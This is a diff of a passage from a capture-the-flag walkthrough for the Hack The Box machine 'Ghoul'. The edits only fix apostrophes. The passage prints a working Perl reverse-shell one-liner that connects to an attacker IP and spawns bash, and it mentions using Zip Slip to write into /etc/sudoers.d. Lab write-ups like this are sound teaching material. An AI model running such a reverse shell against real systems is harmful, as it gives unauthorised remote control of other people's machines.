limbernie/limbernie.github.io/_posts/2019-10-06-ghoul-htb-walkthrough.md

 ## Low-Privilege Shell

-From here on, it\'s easy to get a shell.
+From here on, it's easy to get a shell.
 I'm using the following Perl one-liner.

 ```
 perl -e 'use Socket;$i="10.10.14.11";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
 ```

-It\'s best to `urlencode` the one-liner to prevent any complications when passing it as an URL.
+It's best to `urlencode` the one-liner to prevent any complications when passing it as an URL.
 On my `nc` listener, a shell appears...

 <a class="image-popup">
 ![5e81818d.png](/assets/images/posts/ghoul-htb-walkthrough/5e81818d.png)
 </a>

-It\'s equally easy to [upgrade](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) the shell to a full TTY.
+It's equally easy to [upgrade](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) the shell to a full TTY.

-During enumeration of the `www-data` account, you\'ll realize that `8080/tcp` is running as `root`.
+During enumeration of the `www-data` account, you'll realize that `8080/tcp` is running as `root`.
 As such, we can use Zip Slip to write to anywhere, e.g. `/etc/sudoers.d`.
 Wait a tick, it can't be that easy right?
 Well, that's because we are inside a docker container.

-Here\'s a snippet of the output of `mount`.
+Here's a snippet of the output of `mount`.
 It has all the hallmarks of a docker container.

 <a class="image-popup">
 ![c3b6c4ed.png](/assets/images/posts/ghoul-htb-walkthrough/c3b6c4ed.png)